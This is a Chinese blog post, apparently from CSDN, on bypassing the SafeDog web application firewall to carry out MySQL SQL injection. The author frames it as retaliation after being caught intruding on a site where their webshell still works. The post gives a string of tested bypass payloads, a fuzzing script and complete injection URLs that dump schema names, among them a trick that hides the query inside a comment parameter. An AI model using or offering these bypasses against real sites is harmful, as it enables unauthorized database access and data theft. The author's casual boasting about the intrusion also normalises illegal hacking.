绕过安全狗进行sql注入(MySQL)

最新推荐文章于 2024-06-05 14:13:37 发布
最新推荐文章于 2024-06-05 14:13:37 发布
阅读量1.9w 收藏 49
点赞数 14
分类专栏: Web安全 文章标签: 安全狗 bypass
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/he_and/article/details/81287008
版权

看我如何一步一步绕过安全狗

前言

前几天渗透了一个站,由于没有做好善后工作被管理员发现了,再次访问那个站的时候,管理员已经删了大马,装上了网站安全狗(我估计大马应该是安全狗删除的,毕竟那个管理员真的太懒了,我的小马还在,并且居然菜刀还可以连接),为了给这个管理员增强点安全防护意识,我就开始研究起了安全狗的绕过。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wP1YRUlZ-1594220610175)(http://pbr6eymqa.bkt.clouddn.com/blog/180730/6jgDlDibDh.jpg?imageslim)]

实验环境
  • 网站安全狗v4.0
  • apache 2.4.27
  • php 5.6
  • MySQL 5.7
    我们需要到安全狗官网上去下载最新版的网站安全狗(我用的apache版),将防护等级调到最高,这也是各个网站管理员经常做的事
    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lMiKC1fT-1594220610180)(http://pbr6eymqa.bkt.clouddn.com/blog/180730/IdEECeJdA7.png?imageslim)]
判断注入点

首先是判断注入点,我们通常使用的and 1=1和and 1=2都会被拦截的,贴图如下:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LWhsizYs-1594220610188)(http://pbr6eymqa.bkt.clouddn.com/blog/180730/lL1hAd2j84.png?imageslim)]
真是熟悉的界面!
试了一下能想到的方法(测试点是一个单引号的字符型注入,来自sqlilabs)

payload结果
数据库报错,不拦截
’ and 1=1–+拦截
’ and sss不拦截
’ sss 1=1不拦截
’ and(1=1)拦截

可见如果是字符型的报错注入其实就很好判断,直接看是否报错_,如果想要通过and预算福判断就需要想办法绕过正则,首先and可以替换为**&&**,我们试一下
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Gb5hdaE8-1594220610191)(http://pbr6eymqa.bkt.clouddn.com/blog/180730/bJG1CDKbJi.png?imageslim)]
还是被拦截了,那我们再想办法把1=1给替换掉,只要能表示真假值就达到我们的目的了,我首先想到的就是字符(字符表示真),但是也会被拦截。

payload报错
‘%26%26’a’–+拦截
'%26%261–+拦截
'%26%26true不拦截

所以可以用

&& true
&& false

绕过拦截。
当然除了用and判断注入点,我们还可以使用or不是吗?但是or不出意料是被拦截了的,所以我就用了xor与**||**来代替or,但是经过测试||运用不当是会被拦截的。以下是测试结果

payload报错
'xor 1–+不拦截
'xor true–+不拦截
'|| 1拦截
’ ||(1)不拦截
’ || true不拦截

我想上面的这些方式足够用一段时间了吧!

判断字段数

接下来就是常用的order by语句的绕过了,我看freebuf有个哥们写了一篇文章,直接使用大小写就绕过了,而且他也是安全狗v4.0(他今年(2018)五月份测试的),我测试的时候大小写直接被毫不留情的拦截了,于是稀里糊涂测试了一番,返现直接利用mysql的内联注释直接就过了!
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xAxZsc0y-1594220610192)(http://pbr6eymqa.bkt.clouddn.com/blog/180730/AFK7CBCajh.png?imageslim)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kTFviAwf-1594220610196)(http://pbr6eymqa.bkt.clouddn.com/blog/180730/5K9lBe3ieD.png?imageslim)]

payload报错
'/*!order*//*!by*/1–+不拦截

注:据说有些版本的order by是直接不过滤的,这里也是通过很简单的内联注释就过了,看了安全狗并不在意order by,大多数的waf都是把注意力放在了能爆出数据的union select from上面

union select from

还是老规矩,先用手工试一下哪些地方可以fuzz:

payload报错
union select拦截
xunion select拦截
unionx select不拦截
union x select不拦截
union xselect不拦截
union selectx拦截

经过一番测试,发现我们可以在union与select之间做文章,即我们的fuzz内容是:

/*!union {fuzz} select*/

按照网上现有的词库(常规的),写了一个fuzz脚本

#! /usr/bin/env python
#-*- coding:utf-8 -*-

import requests
from bs4 import BeautifulSoup
import random

Fuzz_a = ['/*!','*/','/**/','/','?','~','!','.','%','-','*','+','=']
Fuzz_b = ['']
Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j']
FUZZ = Fuzz_a+Fuzz_b+Fuzz_c
url = "http://localhost/sqlilabs/Less-1/?id=1' /*!union{0}select*/12345,2,3%23"
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
def fuzz(num):
	string = []
	payload = string([string.append(random.choice(FUZZ)) for i in num])


if __name__ == "__main__":
	while True:
		#payload = ''
		# for i in range(5):
		# 	payload += random.choice(FUZZ)
		for a in FUZZ:
			for b in FUZZ:
				for c in FUZZ:
					for d in FUZZ:
						for e in FUZZ:
							payload = a+b+c+d+e
		url = url.format(payload)
		data = requests.get(url,headers=headers)
		if 'Password' in data.text:
			print '[*]payload:'+url+u'成功过狗!'
			file = open('payload.txt','a')
			file.write(url+'\n ')
			file.close()
		else:
			print 'Nothing!!!'

不知道为什么速度及其慢,跑了一晚上啥也没跑出来,只有再去网上查查资料,看看以往的方法是否可行(这种东西一般是见光死,放出来基本上就没用了)
尽管如此还是被我发现了一些:

http://127.0.0.1/index.php?id=1/*!union/*@--|*//*@--|*//*@--|*/--+%0aselect*/ 1,2,3

上述方法经过我在v4.0上测试,成功绕过。当然,我们在注入的时候需要用到union select from,这里如果直接加上from,肯定是会被过滤掉的(毕竟安全狗也不傻),所以,我们只要在from与表名之间按照union 与select之间同样的规则变形就可以绕过了,例如:

http://localhost/sqlilabs/Less-1/?id=1%27/*!union/*@--|*//*@--|*//*@--|*/--+%0aselect*/%201,2,3/*!from/*@--|*//*@--|*//*@--|*/--+%0ausers*/--+

在实战中我们还会遇到需要查询database()等函数的情况,这也需要绕过,同样可以利用前面的规则绕过,只需要把union select 分别替换为database 与 ()

http://localhost/sqlilabs/Less-1/?id=1%27/*!union/*@--|*//*@--|*//*@--|*/--+%0aselect*/%20/*!database/*@--|*//*@--|*//*@--|*/--+%0a()*/,schema_name,3/*!from/*@--|*//*@--|*//*@--|*/--+%0ainformation_schema.schemata*/--+

上面的语句应该够用了吧。
但是是不是感觉上面的太复杂了?接下来才是重头戏,根据多次的测试,我发现安全狗会把/**/之间的内容直接忽略掉,所以就很有意思了,例如如下链接id存在注入:

http://xxxx/index.php?id=1

那么我们构造这么一个请求:

http://xxxx/index.php?a=/*&id=1 union select schema_name from information_schema.schemata--+*/

你猜猜会发生什么?哈哈,截止发文(2018/7/31)该方法有效!

在这里插入图片描述

tnt阿信
关注
  • 14
    点赞
  • 49
    收藏
    觉得还不错? 一键收藏
  • 14
    评论
专栏目录
SQL注入&WAF过姿势
4ct10n
03-02 2万+
# 1.WAF过滤机制: 1.异常检测协议–拒绝不符合HTTP标准的请求; 2.增强的输入验证–代理和服务端的验证而不只是限于客户端验证; 3.白名单&黑名单机制–白名单适用于稳定的Web应用,黑名单适合处理已知问题; 4.基于规则和基于异常的保护–基于规则更多的依赖黑名单机制基于,基于异常根据系统异常更为灵活; 5.另外还有会话保护、Cookies保护、抗入侵规避技术、响应监视和信息泄
安全狗mysql_Fuzz安全狗4.0实现SQL注入
weixin_42125192的博客
02-05 292
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行过。0×01注入waf过常用手法使用大小写过使用/**/注释符过使用大的数据包过使用/!**/注释符过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
SQL注入安全狗
blackguest07的博客
01-12 2317
SQL注入安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
SQL 注入过(五)
不秃头的程序Yang
06-27 1506
2、实操 2、实操
sql注入详解
最新发布
Cairo_A的博客
06-05 894
SQL注入是由于程序没有对用户输入数据的合法性进行验证和过滤,导致SQL查询语句被恶意拼接从 而产生SQL注入
sql注入常见
weixin_46079186的博客
06-26 1566
目录: 1. 大小写过 2. 双写过 3. 内联注释过 4. 编码过 5. <>过 6. 注释符过 7. 对空格的过 8. 对or/and的过 9. 对等号=的过 10. 对单引号的过 11. 对逗号的过 12. 过滤函数过 13. 过滤–和#时 14. 过滤order by 15. 过滤关键字为空 0x01 大小写过 UniOn SeleCt 0x02 双写过 ununionion seselectlect 0x03 内联注释过 内联注释就是把一些特有的仅在MYS
【WAF剖析】——sql注入之云锁bypass
Demo不是emo的博客
11-26 7671
前天我们实战了安全狗的WAF,今天先来看看比它难度更高的云锁WAF,你会吗?看我带你将它拿下
PHP+MysqlSQL注入源码 下载
04-25
如果发现可以过防护,那么就需要对源码进行修正,确保所有用户输入都经过适当的过滤和转义。 总的来说,理解SQL注入和如何预防是每个Web开发者必备的技能。通过学习这个带SQL注入源码的示例,开发者不仅可以增强...
SQL注入 安全狗apache主程序版本v4.0.23137 过1
08-03
标题中的“SQL注入”是指一种常见...对于防御SQL注入,应确保对用户输入进行充分的验证和转义,使用参数化查询,或者采用预编译的SQL语句,同时保持软件更新以修复已知的安全漏洞,如升级安全狗到最新版本v4.0.26655。
10-sql注入-mysql注入1
08-03
- 简单的SQL注入检测函数,如文中示例,通过替换或正则匹配关键字来防止注入,但可以被大小写变换、%00编码等方式过。 - 使用`AND 1=1`和`AND 1=2`来判断注入点的存在,通过改变条件的真假来观察响应变化。 - `...
mysql注入过技术
06-04
本篇文章将深入探讨MySQL注入过技术的核心知识点,并基于给定的部分内容进行详细的分析。 #### MySQL语法基础 在讨论具体的过技术之前,我们首先简要回顾一下MySQL的基本语法。这包括但不限于数据查询、条件...
Web应用安全:使用SQL注入过认证实验.doc
06-17
Web应用安全领域中,SQL注入是一种常见的攻击手段,它允许恶意用户通过构造特定的SQL语句,过系统的身份验证,获取或修改数据库中的敏感信息。以下是对"使用SQL注入过认证"实验的详细说明: 一、实验目的 1. ...
SQL注入(7)
qq_56289291的博客
07-28 155
SQL注入过手段 大小写过 如果程序中设置了过滤关键字,但是过滤过程中并没有对关键字组成进行深入分析过滤,导致只是对整体进行过滤。例如:and 过滤。当然这种过滤只是发现关键字出现,并不会对关键字处理。 通过修改关键字内字母大小写来过过滤措施。例如:AnD 1=1 例如:在进行探测当前表的字段数时,使用order by 数字进行探测。如果过滤了order ,可以使用OrdER来进行过。 双写过 如果在程序中设置出现关键字之后替换为空,那么SQL注入攻击也不会发生。对于这样的过滤策略可以使用双
SQL注入-安全狗
LJH1999ZN的博客
02-15 5036
安全狗的常见四种方式 id=1'/*!44444order*/ /*!44444by*/3--+
SQL注入安全狗的五种方法
01-11 1314
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
安全狗SQL注入
qq_38675102的博客
02-09 2519
安全狗waf
安全狗拦截的SQL注入
记录学习,一起进步
02-26 2861
安全狗拦截的SQL注入
【超详细版】SQL注入原理及思路过(看这篇就够了)
热门推荐
fly_enum的博客
12-30 1万+
当web应用向后台数据库传递SQL语句进行数据库操作时,如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。
java order by 防止注入的方法
滕青山博客
01-04 2437
注入方法 /** * 仅支持字母、数字、下划线、空格、逗号、小数点(支持多个字段排序) */ public static String SQL_PATTERN = "[a-zA-Z0-9_\\ \\,\\.]+"; /** * 检查字符,防止注入过 */ public static String escapeOrderBySql(String value) { if (StringUtils.isNotEm
评论 14
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值